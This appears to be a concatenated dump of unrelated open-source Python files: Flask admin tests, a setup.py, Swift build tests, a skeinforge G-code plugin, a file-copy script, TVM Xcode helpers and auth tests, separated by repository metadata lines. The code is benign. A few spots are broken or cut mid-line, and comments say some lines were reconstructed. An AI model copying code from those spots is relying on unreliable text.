url = f'/admin/orga_teams/teams/{party.i | d}/create'
response = orga_team_admin_client.get(url)
assert response.status_code == 200
def test_team_create_and_delete(orga_team_admin_client, party):
    """Creating a team via POST adds it; deleting it via DELETE removes it."""
    assert orga_team_service.count_teams_for_party(party.id) == 0

    url = f'/admin/orga_teams/teams/{party.id}'
    form_data = {'title': 'Support'}
    response = orga_team_admin_client.post(url, data=form_data)
    assert response.status_code == 302  # redirect after successful creation
    assert orga_team_service.count_teams_for_party(party.id) == 1

    teams = orga_team_service.get_teams_for_party(party.id)
    assert len(teams) == 1
    team = list(teams)[0]

    url = f'/admin/orga_teams/teams/{team.id}'
    response = orga_team_admin_client.delete(url)
    assert response.status_code == 204  # no content after successful deletion
    assert orga_team_service.find_team(team.id) is None
    assert orga_team_service.count_teams_for_party(party.id) == 0
def test_teams_copy_form_with_target_party_teams(orga_team_admin_client, brand):
    """The copy form redirects (302) when the target party already has teams."""
    source_party = create_party(brand.id, party_id='source', title='Source')
    target_party = create_party(brand.id, party_id='target', title='Target')
    team = orga_team_service.create_team(target_party.id, 'Security')

    url = f'/admin/orga_teams/teams/{target_party.id}/copy'
    response = orga_team_admin_client.get(url)
    assert response.status_code == 302

    # Clean up.
    orga_team_service.delete_team(team.id)
    for party in source_party, target_party:
        party_service.delete_party(party.id)
def test_teams_copy_form_without_source_teams(orga_team_admin_client, brand):
    """The copy form redirects (302) when no other party offers teams to copy."""
    target_party = create_party(brand.id, party_id='target', title='Target')

    url = f'/admin/orga_teams/teams/{target_party.id}/copy'
    response = orga_team_admin_client.get(url)
    assert response.status_code == 302

    # Clean up.
    party_service.delete_party(target_party.id)
def test_teams_copy_form_with_source_teams(orga_team_admin_client, brand):
    """The copy form renders (200) when another party has teams to copy from."""
    source_party = create_party(brand.id, party_id='source', title='Source')
    target_party = create_party(brand.id, party_id='target', title='Target')
    team = orga_team_service.create_team(source_party.id, 'Tech')

    url = f'/admin/orga_teams/teams/{target_party.id}/copy'
    response = orga_team_admin_client.get(url)
    assert response.status_code == 200

    # Clean up.
    orga_team_service.delete_team(team.id)
    for party in source_party, target_party:
        party_service.delete_party(party.id)
def test_teams_copy(orga_team_admin_client, brand):
    """POSTing the copy form copies all teams from the source to the target party."""
    source_party = create_party(brand.id, party_id='source', title='Source')
    target_party = create_party(brand.id, party_id='target', title='Target')
    team1 = orga_team_service.create_team(source_party.id, 'Support')
    team2 = orga_team_service.create_team(source_party.id, 'Tech')
    assert orga_team_service.count_teams_for_party(source_party.id) == 2
    assert orga_team_service.count_teams_for_party(target_party.id) == 0

    url = f'/admin/orga_teams/teams/{target_party.id}/copy'
    form_data = {'party_id': source_party.id}
    response = orga_team_admin_client.post(url, data=form_data)
    assert response.status_code == 302
    # Copying duplicates the teams; the source keeps its own.
    assert orga_team_service.count_teams_for_party(source_party.id) == 2
    assert orga_team_service.count_teams_for_party(target_party.id) == 2

    # Clean up.
    new_teams = orga_team_service.get_teams_for_party(target_party.id)
    for team in {team1, team2}.union(new_teams):
        orga_team_service.delete_team(team.id)
    for party in source_party, target_party:
        party_service.delete_party(party.id)
|
smcmahon/beatbox | setup.py | Python | gpl-2.0 | 672 | 0.046131 |
from setuptools import setup


def _read(filename):
    """Return the contents of *filename*, closing the file handle.

    The previous version used bare ``open(...).read()``, which leaks the
    file descriptor until garbage collection.
    """
    with open(filename) as f:
        return f.read()


setup(
    name='beatbox',
    version='20.1',  # be sure to update the version in _beatbox.py too
    package_dir={'': 'src'},
    packages=['beatbox'],
    author='Simon Fell et al',
    author_email='plonesf@googlegroups.com',
    description='A Python library for querying/updating Saleforce.com data via SOAP API',
    long_description=_read('README.txt') + '\n' + _read('CHANGES.txt'),
    license='GNU GENERAL PUBLIC LICENSE Version 2',
    keywords='python salesforce salesforce.com',
    url='http://code.google.com/p/salesforce-beatbox/',
    classifiers=['Development Status :: 5 - Production/Stable'],
)
|
apple/swift | utils/build_swift/tests/build_swift/test_defaults.py | Python | apache-2.0 | 4,351 | 0 | # This source file is part of the Swift.org open source project
#
# Copyright (c) 2014 - 2020 Apple Inc. and the Swift project authors
# Licensed under Apache License v2.0 with Runtime Library Exception
#
# See https://swift.org/LICENSE.txt for license information
# See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
from __future__ import absolute_import, unicode_literals
import unittest
from build_swift import defaults
from build_swift import shell
from .. import utils
# Prefer the stdlib mock (available since Python 3.3); on older runtimes fall
# back to inert stand-ins so this module still imports and the
# @utils.requires_module('unittest.mock') guards can skip the tests.
try:
    # Python 3.3
    from unittest import mock
    from unittest.mock import patch, MagicMock
except ImportError:
    mock = None
    class MagicMock(object):
        # Accepts any constructor arguments and does nothing.
        def __init__(self, *args, **kwargs):
            pass
    def patch(*args, **kwargs):
        # No-op decorator factory: returns the decorated function unchanged.
        return lambda func: func
# ----------------------------------------------------------------------------
# Constants

# 16 GiB — the value a `sysctl hw.memsize` query reports on a 16 GB Mac.
_SYSCTL_HW_MEMSIZE = 17179869184
_SYSCTL_HW_MEMSIZE_OUTPUT = 'hw.memsize: {}'.format(_SYSCTL_HW_MEMSIZE)
# Safe upper bound to sanity check the LTO link job heuristics.
_LTO_LINK_JOBS_UPPER_BOUND = 100
# ----------------------------------------------------------------------------
class TestDefaults(unittest.TestCase):
    """Unit tests for the defaults module in build_swift."""

    # ------------------------------------------------------------------------
    # _system_memory

    @utils.requires_module('unittest.mock')
    @patch('platform.platform', MagicMock(return_value='Darwin'))
    def test_system_memory_darwin_platform(self):
        # On Darwin the memory size is parsed from `sysctl hw.memsize`.
        with mock.patch.object(shell, 'check_output') as mock_check_output:
            mock_check_output.return_value = _SYSCTL_HW_MEMSIZE_OUTPUT
            self.assertEqual(
                defaults._system_memory(), _SYSCTL_HW_MEMSIZE)

    @utils.requires_module('unittest.mock')
    @patch('platform.platform', MagicMock(return_value='Darwin'))
    def test_system_memory_darwin_platform_when_sysctl_fails(self):
        # A failing sysctl invocation degrades to "unknown" (None).
        with mock.patch.object(shell, 'check_output') as mock_check_output:
            mock_check_output.side_effect = shell.CalledProcessError(
                returncode=1,
                cmd=['sysctl', 'hw.memsize'])
            self.assertIsNone(defaults._system_memory())

    @utils.requires_module('unittest.mock')
    @patch('platform.platform', MagicMock(return_value='Linux'))
    def test_system_memory_linux_platform(self):
        self.assertIsNone(defaults._system_memory())

    @utils.requires_module('unittest.mock')
    @patch('platform.platform', MagicMock(return_value='Windows'))
    def test_system_memory_windows_platform(self):
        self.assertIsNone(defaults._system_memory())

    # ------------------------------------------------------------------------
    # _default_llvm_lto_link_jobs

    @utils.requires_module('unittest.mock')
    def test_default_llvm_lto_link_jobs(self):
        with mock.patch.object(defaults, '_system_memory') as mock_memory:
            mock_memory.return_value = _SYSCTL_HW_MEMSIZE
            lto_link_jobs = defaults._default_llvm_lto_link_jobs()
            self.assertIsNotNone(lto_link_jobs)
            self.assertLess(lto_link_jobs, _LTO_LINK_JOBS_UPPER_BOUND)

    @utils.requires_module('unittest.mock')
    def test_default_llvm_lto_link_jobs_with_unknown_system_memory(self):
        with mock.patch.object(defaults, '_system_memory') as mock_memory:
            mock_memory.return_value = None
            self.assertIsNone(defaults._default_llvm_lto_link_jobs())

    # ------------------------------------------------------------------------
    # _default_swift_lto_link_jobs

    @utils.requires_module('unittest.mock')
    def test_default_swift_lto_link_jobs(self):
        with mock.patch.object(defaults, '_system_memory') as mock_memory:
            mock_memory.return_value = _SYSCTL_HW_MEMSIZE
            lto_link_jobs = defaults._default_swift_lto_link_jobs()
            self.assertIsNotNone(lto_link_jobs)
            self.assertLess(lto_link_jobs, _LTO_LINK_JOBS_UPPER_BOUND)

    @utils.requires_module('unittest.mock')
    def test_default_swift_lto_link_jobs_with_unknown_system_memory(self):
        with mock.patch.object(defaults, '_system_memory') as mock_memory:
            mock_memory.return_value = None
            # Copy-paste fix: this test previously exercised the LLVM
            # variant (_default_llvm_lto_link_jobs) instead of the Swift one.
            self.assertIsNone(defaults._default_swift_lto_link_jobs())
|
AlexeyKruglov/Skeinforge-fabmetheus | skeinforge_application/skeinforge_plugins/craft_plugins/preface.py | Python | agpl-3.0 | 10,703 | 0.019434 | #! /usr/bin/env python
"""
This page is in the table of contents.
Preface converts the svg slices into gcode extrusion layers, optionally with home, positioning, turn off, and unit commands.
The preface manual page is at:
http://fabmetheus.crsndoo.com/wiki/index.php/Skeinforge_Preface
==Settings==
===Meta===
Default is empty.
The 'Meta' field is to add meta tags or a note to all your files. Whatever is in that field will be added in a meta tagged line to the output.
===Set Positioning to Absolute===
Default is on.
When selected, preface will add the G90 command to set positioning to absolute.
===Set Units to Millimeters===
Default is on.
When selected, preface will add the G21 command to set the units to millimeters.
===Start at Home===
Default is off.
When selected, the G28 go to home gcode will be added at the beginning of the file.
===Turn Extruder Off===
====Turn Extruder Off at Shut Down====
Default is on.
When selected, the M103 turn extruder off gcode will be added at the end of the file.
====Turn Extruder Off at Start Up====
Default is on.
When selected, the M103 turn extruder off gcode will be added at the beginning of the file.
==Examples==
The following examples preface the file Screw Holder Bottom.stl. The examples are run in a terminal in the folder which contains Screw Holder Bottom.stl and preface.py.
> python preface.py
This brings up the preface dialog.
> python preface.py Screw Holder Bottom.stl
The preface tool is parsing the file:
Screw Holder Bottom.stl
..
The preface tool has created the file:
.. Screw Holder Bottom_preface.gcode
"""
from __future__ import absolute_import
#Init has to be imported first because it has code to workaround the python bug where relative imports don't work if the module is imported as a main module.
import __init__
from datetime import date, datetime
from fabmetheus_utilities.fabmetheus_tools import fabmetheus_interpret
from fabmetheus_utilities.svg_reader import SVGReader
from fabmetheus_utilities import archive
from fabmetheus_utilities import euclidean
from fabmetheus_utilities import gcodec
from fabmetheus_utilities import intercircle
from fabmetheus_utilities import settings
from fabmetheus_utilities import svg_writer
from skeinforge_application.skeinforge_utilities import skeinforge_craft
from skeinforge_application.skeinforge_utilities import skeinforge_polyfile
from skeinforge_application.skeinforge_utilities import skeinforge_profile
from time import strftime
import os
import sys
__author__ = 'Enrique Perez (perez_enrique@yahoo.com)'
__date__ = '$Date: 2008/02/05 $'
__license__ = 'GNU Affero General Public License http://www.gnu.org/licenses/agpl.html'
def getCraftedText( fileName, text='', repository = None ):
	"Preface and convert an svg file or text; the file is only read when text is empty."
	return getCraftedTextFromText(archive.getTextIfEmpty(fileName, text), repository)
def getCraftedTextFromText( text, repository = None ):
	"Preface and convert an svg text, returning it unchanged when already prefaced or empty."
	if gcodec.isProcedureDoneOrFileIsEmpty( text, 'preface'):
		return text
	# Identity check is the idiomatic (and reliable) None test; was `== None`.
	if repository is None:
		repository = settings.getReadRepository(PrefaceRepository())
	return PrefaceSkein().getCraftedGcode(repository, text)
def getNewRepository():
	'Get a new preface settings repository.'
	return PrefaceRepository()
def writeOutput(fileName, shouldAnalyze=True):
	"Preface the carving of a gcode file, optionally running the analyze plugins afterwards."
	skeinforge_craft.writeChainTextWithNounMessage(fileName, 'preface', shouldAnalyze)
class PrefaceRepository:
	"A class to handle the preface settings."
	def __init__(self):
		"Set the default settings, execute title & settings fileName."
		# NOTE: two lines below (self.meta, settings.LabelSeparator) were
		# reconstructed from extraction-garbled text.
		skeinforge_profile.addListsToCraftTypeRepository('skeinforge_application.skeinforge_plugins.craft_plugins.preface.html', self )
		self.fileNameInput = settings.FileNameInput().getFromFileName( fabmetheus_interpret.getGNUTranslatorGcodeFileTypeTuples(), 'Open File for Preface', self, '')
		self.openWikiManualHelpPage = settings.HelpPage().getOpenFromAbsolute('http://fabmetheus.crsndoo.com/wiki/index.php/Skeinforge_Preface')
		self.meta = settings.StringSetting().getFromValue('Meta:', self, '')
		self.setPositioningToAbsolute = settings.BooleanSetting().getFromValue('Set Positioning to Absolute', self, True )
		self.setUnitsToMillimeters = settings.BooleanSetting().getFromValue('Set Units to Millimeters', self, True )
		self.startAtHome = settings.BooleanSetting().getFromValue('Start at Home', self, False )
		settings.LabelSeparator().getFromRepository(self)
		settings.LabelDisplay().getFromName('- Turn Extruder Off -', self )
		self.turnExtruderOffAtShutDown = settings.BooleanSetting().getFromValue('Turn Extruder Off at Shut Down', self, True )
		self.turnExtruderOffAtStartUp = settings.BooleanSetting().getFromValue('Turn Extruder Off at Start Up', self, True )
		self.executeTitle = 'Preface'
	def execute(self):
		"Preface button has been clicked."
		fileNames = skeinforge_polyfile.getFileOrDirectoryTypesUnmodifiedGcode(self.fileNameInput.value, fabmetheus_interpret.getImportPluginFileNames(), self.fileNameInput.wasCancelled)
		for fileName in fileNames:
			writeOutput(fileName)
class PrefaceSkein:
"A class to preface a skein of extrusions."
	def __init__(self):
		# Gcode emitter that accumulates the prefaced output.
		self.distanceFeedRate = gcodec.DistanceFeedRate()
		# Presumably toggled while parsing extruder on/off commands — TODO confirm.
		self.extruderActive = False
		self.lineIndex = 0
		self.oldLocation = None
		# Parses the svg slice layers produced by the carve step.
		self.svgReader = SVGReader()
def addInitializationToOutput(self):
"Add initialization gcode to the output."
self.distanceFeedRate.addTagBracketedLine('format', 'skeinforge gcode')
absoluteFilePathUntilDot = archive.getUntilDot(archive.getCraftPluginsDirectoryPath('preface.py'))
dateTodayString = date.today().isoformat().replace('-', '.')[2 :]
if absoluteFilePathUntilDot == '/home/enrique/Desktop/backup/babbleold/script/reprap/fabmetheus/skeinforge_application/skeinforge_plugins/craft_plugins/preface': #is this script on Enrique's computer?
archive.writeFileText(archive.getVersionFileName(), dateTodayString)
versionText = archive.getFileText(archive.getVersionFileName())
self.distanceFeedRate.addTagBracketedLine('version', versionText)
dateTimeTuple = datetime.now().timetuple()
created = dateTodayString + '|%s:%s' % (dateTimeTuple[3], dateTimeTuple[4])
self.distanceFeedRate.addTagBracketedLine('created', created)
self.distanceFeedRate.addLine('(<extruderInitialization>)')
if self.repository.setPositioningToAbsolute.value:
self.distanceFeedRate.addLine('G90 ;set positioning to absolute') # Set positioning to absolute.
if self.repository.setUnitsToMillimeters.value:
self.distanceFeedRate.addLine('G21 ;set units to millimeters') # Set units to millimeters.
if self.repository.startAtHome.value:
self.distanceFeedRate.addLine('G28 ;start at home') # Start at home.
if self.repository.turnExtruderOffAtStartUp.value:
self.distanceFeedRate.addLine('M103') # Turn extruder off.
craftTypeName = skeinforge_profile.getCraftTypeName()
self.distanceFeedRate.addTagBracketedLine('craftTypeName', craftTypeName)
self.distanceFeedRate.addTagBracketedLine('decimalPlacesCarried', self.distanceFeedRate.decimalPlacesCarried)
layerHeight = float(self.svgReader.sliceDictionary['layerHeight'])
self.distanceFeedRate.addTagRoundedLine('layerThickness', layerHeight)
self.distanceFeedRate.addTagRoundedLine('layerHeight', layerHeight)
if self.repository.meta.value:
self.distanceFeedRate.addTagBracketedLine('meta', self.repository.meta.value)
edgeWidth = float(self.svgReader.sliceDictionary['edgeWidth'])
self.distanceFeedRate.addTagRoundedLine('edgeWidth', edgeWidth)
self.distanceFeedRate.addTagRoundedLine('perimeterWidth', edgeWidth)
self.distanceFeedRate.addTagBracketedLine('profileName', skeinforge_profile.getProfileName(craftTypeName))
self.distanceFeedRate.addLine('(<settings>)')
pluginFileNames = skeinforge_craft.getPluginFileNames()
for pluginFileName in pluginFileNames:
self.addToolSettingLines(pluginFileName)
self.distanceFeedRate.addLine('(</settings>)')
self.distanceFeedRate.addTagBracketedLine('timeStampPreface', strftime('%Y%m%d_%H%M%S'))
procedureNames = self.svgReader.sliceDictionary['procedureName'].replace(',', ' ').split()
for procedureName in procedu |
dcodix/mv-elsewhere | mv-elsewhere.py | Python | gpl-2.0 | 5,068 | 0.00513 | #! /usr/bin/env python
# Copyright (C) 2012 dcodix
# This file may be distributed and/or modified under the terms of
# the GNU General Public License version 2 as published by
# the Free Software Foundation.
# This file is distributed without any warranty; without even the implied
# warranty of merchantability or fitness for a particular purpose.
# See "LICENSE.GPL" in the source distribution for more information.
""" This script will take filenames from the stdin and copy/move them to a
directory destination preserving the directory tree and atributes.
Most of the functionality is taken from shutil module.
"""
import os
import sys
import stat
import errno
import getopt
import argparse
from shutil import *
import time
def copydirtree(src, dst, symlinks=False, ignore=None, copy_function=copy2,
                ignore_dangling_symlinks=False):
    """Recursively recreate the directory skeleton of *src* below *dst*.

    A variant of shutil.copytree that creates the directories of the tree
    (preserving their stat attributes) but copies none of the files or
    links.  *dst* must not already exist.

    The *symlinks*, *copy_function* and *ignore_dangling_symlinks*
    parameters are accepted for signature compatibility with
    shutil.copytree; only *ignore* affects which directories are visited.

    Raises shutil.Error carrying a list of (src, dst, reason) tuples when
    copying directory attributes fails.
    """
    names = os.listdir(src)
    if ignore is not None:
        ignored_names = ignore(src, names)
    else:
        ignored_names = set()
    os.makedirs(dst)
    errors = []
    for name in names:
        if name in ignored_names:
            continue
        srcname = os.path.join(src, name)
        dstname = os.path.join(dst, name)
        if os.path.isdir(srcname):
            copydirtree(srcname, dstname, symlinks, ignore, copy_function)
    try:
        copystat(src, dst)
    except OSError as why:
        # Copying directory access times may fail on Windows; mirror modern
        # shutil.copytree and ignore only those errors.  The original
        # referenced the builtin WindowsError, which does not exist on other
        # platforms and raised NameError from inside this handler.
        if getattr(why, 'winerror', None) is None:
            # Record one (src, dst, reason) tuple per failure; the original
            # used errors.extend(), flattening the tuple into three items.
            errors.append((src, dst, str(why)))
    if errors:
        raise Error(errors)
def printmessage(logstring):
    """Print *logstring* prefixed with the current Unix timestamp in brackets."""
    print('[{0}] {1}'.format(time.time(), logstring))
def verbosemessage(logstring):
    # Emit only when the module-global `verbose` flag is true; the flag is
    # assigned in main(), so calling this earlier raises NameError.
    if verbose:
        printmessage(logstring)
def debugmessage(logstring):
    # Emit only when the module-global `debuging` flag is true; the flag is
    # assigned in main(), so calling this earlier raises NameError.
    if debuging:
        printmessage(logstring)
def main():
    """Copy or move files listed on stdin into a destination directory.

    Each file's directory tree is recreated (with attributes) below the
    destination, then a summary of how many files were processed is printed.
    """
    dst = ''
    filemove = False
    override = False
    readstdin = True
    global verbose
    global debuging
    verbose = False
    debuging = False
    excludelist = ''
    # GET ARGS
    parser = argparse.ArgumentParser(description='Move files')
    parser.add_argument('-d', '--destdir', nargs=1, help='destination directory')
    parser.add_argument('-D', '--debuging', help='debug', action="store_true")
    parser.add_argument('-m', '--move', help='move instead of copy', action="store_true")
    parser.add_argument('-o', '--override', help='override in destination', action="store_true")
    parser.add_argument('-v', '--verbose', help='verbose', action="store_true")
    # Help-text typo fixed: "esclude" -> "exclude".
    parser.add_argument('-e', '--exclude', nargs='+', help='exclude list')
    args = parser.parse_args()
    if args.destdir:
        dst = args.destdir[0]
    if args.debuging:
        verbose = True
        debuging = True
    if args.move:
        filemove = True
    if args.override:
        override = True
    if args.verbose:
        verbose = True
    if args.exclude:
        excludelist = args.exclude
    # PROCESS
    nfiles = 0
    while True:
        excludefile = False
        # `readstdin` leaves room for the future possibility of reading the
        # file list from a file instead of stdin.
        if readstdin:
            file1 = sys.stdin.readline()
            if not file1:
                break
            file1 = file1.rstrip()
        debugmessage('file ' + file1)
        fpath = os.path.dirname(file1)
        if not fpath:
            fpath = file1
        # Use the timestamped debug helper for consistency (was a bare print).
        debugmessage('fpath ' + fpath)
        if excludelist:
            for exclude in excludelist:
                # This line was extraction-garbled ("excl | ude") and has
                # been reconstructed.
                if exclude in file1:
                    excludefile = True
                    debugmessage('file ' + file1 + ' will be excluded')
        dfile = dst + '/' + file1
        dpath = dst + '/' + fpath
        if not os.path.isdir(dpath):
            # Log-message typo fixed: "COPYNG" -> "COPYING".
            verbosemessage('COPYING TREE: from ' + fpath + ' to ' + dpath)
            copydirtree(fpath, dpath)
        if not os.path.isdir(file1) and not excludefile:
            if not os.path.exists(dfile) or override:
                if filemove:
                    verbosemessage('MOVING: ' + file1 + ' to ' + dfile)
                    move(file1, dfile)
                    nfiles = nfiles + 1
                else:
                    verbosemessage('COPYING: ' + file1 + ' to ' + dfile)
                    copy2(file1, dfile)
                    nfiles = nfiles + 1
            else:
                verbosemessage('NOT OVERRIDING: ' + dfile)
        elif excludefile:
            verbosemessage('EXCLUDED: ' + file1)
    if nfiles == 0:
        printmessage('No files have been moved or copied.')
    elif filemove:
        printmessage(str(nfiles) + ' files have been moved.')
    else:
        printmessage(str(nfiles) + ' files have been copied.')
if __name__ == "__main__":
main()
|
sxjscience/tvm | python/tvm/contrib/xcode.py | Python | apache-2.0 | 7,815 | 0.000896 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name
"""Utility to invoke Xcode compiler toolchain"""
from __future__ import absolute_import as _abs
import os
import sys
import subprocess
import json
from .._ffi.base import py_str
from . import util
def xcrun(cmd):
    """Invoke the ``xcrun`` tool locator with *cmd* and return its output.

    Parameters
    ----------
    cmd : list of str
        Arguments appended after ``xcrun``.

    Returns
    -------
    out : str
        Combined stdout/stderr of the command, stripped of whitespace.
    """
    full_cmd = ["xcrun"] + cmd
    process = subprocess.Popen(
        full_cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
    )
    out, _ = process.communicate()
    return out.strip()
def codesign(lib):
    """Codesign the shared library at path *lib*.

    Signing is a required step for the library to be loaded in the app.
    The signature identity is read from the TVM_IOS_CODESIGN environment
    variable; RuntimeError is raised when it is unset or signing fails.

    Parameters
    ----------
    lib : The path to the library.
    """
    if "TVM_IOS_CODESIGN" not in os.environ:
        raise RuntimeError("Require environment variable TVM_IOS_CODESIGN " " to be the signature")
    signature = os.environ["TVM_IOS_CODESIGN"]
    cmd = ["codesign", "--force", "--sign", signature, lib]
    process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    out, _ = process.communicate()
    if process.returncode != 0:
        raise RuntimeError("Codesign error:\n" + py_str(out))
def create_dylib(output, objects, arch, sdk="macosx"):
    """Link object files into a dynamic library with the SDK's clang.

    Parameters
    ----------
    output : str
        The target shared library.
    objects : str or list
        A single object file, or a list of object files.
    arch : str
        Target major architecture.
    sdk : str
        The sdk to be used.
    """
    clang = xcrun(["-sdk", sdk, "-find", "clang"])
    sdk_path = xcrun(["-sdk", sdk, "--show-sdk-path"])
    cmd = [
        clang,
        "-dynamiclib",
        "-arch", arch,
        "-isysroot", sdk_path,
        "-o", output,
    ]
    if isinstance(objects, str):
        cmd.append(objects)
    else:
        cmd.extend(objects)
    process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    out, _ = process.communicate()
    if process.returncode != 0:
        raise RuntimeError("Compilation error:\n" + py_str(out))


# assign so as default output format
create_dylib.output_format = "dylib"
def compile_metal(code, path_target=None, sdk="macosx"):
    """Compile metal with CLI tool from env.

    Parameters
    ----------
    code : str
        The metal source code.

    path_target : str, optional
        Output file.

    sdk : str, optional
        The target platform SDK.

    Return
    ------
    metallib : bytearray
        The bytearray of the metallib, or None when compilation failed.
    """
    temp = util.tempdir()
    temp_code = temp.relpath("my_lib.metal")
    temp_ir = temp.relpath("my_lib.air")
    temp_target = temp.relpath("my_lib.metallib")
    with open(temp_code, "w") as out_file:
        out_file.write(code)
    file_target = path_target if path_target else temp_target
    # See:
    # - https://developer.apple.com/documentation/metal/gpu_functions_libraries/building_a_library_with_metal_s_command-line_tools#overview # pylint: disable=line-too-long
    #
    # xcrun -sdk macosx metal -c MyLibrary.metal -o MyLibrary.air
    # xcrun -sdk macosx metallib MyLibrary.air -o MyLibrary.metallib
    cmd1 = ["xcrun", "-sdk", sdk, "metal", "-O3"]
    cmd1 += ["-c", temp_code, "-o", temp_ir]
    cmd2 = ["xcrun", "-sdk", sdk, "metallib"]
    cmd2 += [temp_ir, "-o", file_target]
    proc = subprocess.Popen(
        " ".join(cmd1) + ";" + " ".join(cmd2),
        shell=True,
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,
    )
    (out, _) = proc.communicate()
    if proc.returncode != 0:
        sys.stderr.write("Compilation error:\n")
        sys.stderr.write(py_str(out))
        sys.stderr.flush()
        libbin = None
    else:
        # Close the handle promptly; the original used a bare
        # open(...).read(), leaking the file descriptor.
        with open(file_target, "rb") as lib_file:
            libbin = bytearray(lib_file.read())
    return libbin
def compile_coreml(model, model_name="main", out_dir="."):
    """Compile a coreml model and return the compiled bundle's path."""
    mlmodel_path = os.path.join(out_dir, model_name + ".mlmodel")
    mlmodelc_path = os.path.join(out_dir, model_name + ".mlmodelc")
    metadata = {
        "inputs": list(model.input_description),
        "outputs": list(model.output_description),
    }
    # Use the description field to send info to CoreML runtime.
    model.short_description = json.dumps(metadata)
    model.save(mlmodel_path)
    compiler_output = xcrun(["coremlcompiler", "compile", mlmodel_path, out_dir])
    if not os.path.isdir(mlmodelc_path):
        raise RuntimeError("Compile failed: %s" % compiler_output)
    return mlmodelc_path
class XCodeRPCServer(object):
    """Wrapper for RPC server

    Parameters
    ----------
    cmd : list of str
        The command to run
    lock: FileLock
        Lock on the path
    """
    def __init__(self, cmd, lock):
        # Launch the server as a child process; the lock stays held until
        # join() releases it.
        self.proc = subprocess.Popen(cmd)
        self.lock = lock
    def join(self):
        """Wait server to finish and release its resource"""
        self.proc.wait()
        self.lock.release()
def popen_test_rpc(host, port, key, destination, libs=None, options=None):
    """Launch rpc server via xcodebuild test through another process.

    Parameters
    ----------
    host : str
        The address of RPC proxy host.
    port : int
        The port of RPC proxy host
    key : str
        The key of the RPC server
    destination : str
        Destination device of deployment, as in xcodebuild
    libs : list of str
        List of files to be packed into app/Frameworks/tvm
        These can be dylibs that can be loaded remotely by RPC.
    options : list of str
        Additional options to xcodebuild

    Returns
    -------
    proc : Popen
        The test rpc server process.
        Don't do wait() on proc, since it can terminate normally.
    """
    if "TVM_IOS_RPC_ROOT" in os.environ:
        rpc_root = os.environ["TVM_IOS_RPC_ROOT"]
    else:
        curr_path = os.path.dirname(os.path.realpath(os.path.expanduser(__file__)))
        rpc_root = os.path.join(curr_path, "../../../apps/ios_rpc")
    proj_path = os.path.realpath(os.path.join(rpc_root, "tvmrpc.xcodeproj"))
    if not os.path.exists(proj_path):
        # The original joined these pieces with `+`, which applied `%` only
        # to the second literal (no placeholder) and raised TypeError
        # instead of the intended RuntimeError.
        raise RuntimeError(
            "Cannot find tvmrpc.xcodeproj in %s,"
            " please set env TVM_IOS_RPC_ROOT correctly" % rpc_root
        )
    # Lock the path so only one test run uses the project at a time.
    lock = util.filelock(os.path.join(rpc_root, "ios_rpc.lock"))
    with open(os.path.join(rpc_root, "rpc_config.txt"), "w") as fo:
        fo.write("%s %d %s\n" % (host, port, key))
        libs = libs if libs else []
        for file_name in libs:
            fo.write("%s\n" % file_name)
    cmd = [
        "xcrun",
        "xcodebuild",
        "-scheme",
        "tvmrpc",
        "-project",
        proj_path,
        "-destination",
        destination,
    ]
    if options:
        cmd += options
    cmd += ["test"]
    return XCodeRPCServer(cmd, lock)
|
mkeilman/sirepo | tests/auth/guest1_test.py | Python | apache-2.0 | 1,794 | 0.000557 | # -*- coding: utf-8 -*-
u"""Test auth.guest
:copyright: Copyright (c) 2019 RadiaSoft LLC. All Rights Reserved.
:license: http://www.apache.org/licenses/LICENSE-2.0.html
"""
from __future__ import absolute_import, division, print_function
import pytest
def test_happy_path(auth_fc):
    """Guest login creates a logged-in session with guest-user defaults.

    Removed eight unused function-local imports (pkconfig, pkunit, pkio,
    pkok, pkre, pkeq, pkdp, re) that the body never referenced.
    """
    fc = auth_fc
    fc.sr_get('authGuestLogin', {'simulation_type': fc.sr_sim_type})
    fc.sr_post('listSimulations', {'simulationType': fc.sr_sim_type})
    fc.sr_auth_state(
        avatarUrl=None,
        displayName='Guest User',
        guestIsOnlyMethod=False,
        isGuestUser=True,
        isLoggedIn=True,
        isLoginExpired=False,
        method='guest',
        needCompleteRegistration=False,
        userName=None,
        visibleMethods=['email'],
    )
def test_timeout(auth_fc):
    """A guest session is marked expired after the configured lifetime.

    Two extraction-garbled lines (the sr_get call and the isLoggedIn check)
    were reconstructed; unused function-local imports were removed.
    """
    fc = auth_fc
    from pykern import pkjson
    from pykern.pkunit import pkeq, pkexcept

    r = fc.sr_get('authGuestLogin', {'simulation_type': fc.sr_sim_type}, redirect=False)
    pkeq(200, r.status_code)
    d = pkjson.load_any(r.data)
    pkeq(True, d.authState.isLoggedIn)
    fc.sr_post('listSimulations', {'simulationType': fc.sr_sim_type})
    fc.sr_auth_state(
        isGuestUser=True,
        isLoggedIn=True,
        isLoginExpired=False,
    )
    # Advance the server clock past the guest-session lifetime.
    fc.sr_get_json('adjustTime', params={'days': '2'})
    fc.sr_auth_state(
        isGuestUser=True,
        isLoggedIn=True,
        isLoginExpired=True,
    )
    with pkexcept('SRException.*guest-expired'):
        fc.sr_post('listSimulations', {'simulationType': fc.sr_sim_type})
|
tdickers/mitmproxy | netlib/tutils.py | Python | mit | 3,536 | 0.000848 | from io import BytesIO
import tempfile
import os
import time
import shutil
from contextlib import contextmanager
import six
import sys
from netlib import utils, tcp, http
def treader(bytes):
    """
    Construct a tcp.Reader object from bytes.

    NOTE(review): the parameter name shadows the builtin ``bytes``; kept
    unchanged for interface compatibility with existing callers.
    """
    fp = BytesIO(bytes)
    return tcp.Reader(fp)
@contextmanager
def tmpdir(*args, **kwargs):
    """Create a temporary directory, chdir into it, and yield its path.

    *args and **kwargs are forwarded to tempfile.mkdtemp.  On exit the
    previous working directory is restored and the temporary directory
    removed — even when the with-body raises (the original skipped both
